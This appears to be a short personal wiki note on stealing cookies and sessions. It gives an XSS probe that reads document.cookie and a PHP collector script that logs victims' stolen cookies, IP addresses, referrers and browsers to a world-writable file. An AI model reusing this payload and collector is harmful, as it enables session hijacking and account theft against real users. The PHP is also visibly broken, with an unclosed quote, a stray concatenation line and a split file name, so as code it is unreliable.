Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-05-26T04:06:51-04:00

====== cookies and sessions stealing ======
Created Tuesday 26 May 2020

====== add-on ======

**cookie-editor**


check 
<script>alert(document.cookie)</script>


====== php ======

**<?php**
**$ip=$_SERVER['REMOTE_ADDR'];**
**$c=$_GET['C'];**
**$referer=$_SERVER['HTTP_REFERER'];**
**$browser=$_SERVER['HTTP_USER_AGENT]**
**$data="IP:".$ip."\n"."cookie:".$c."\n";**
**."Referrer: " . $referer . "\n"."Browser: ".$browser . "\n\n";**
**$log = "/tmp/atmail-coo kies.txt";**
**@chmod($log, 0777);**

**$f = fopen($log, 'a');**
**fwrite($f, $data);**
**fclose ($f);**
**?>**
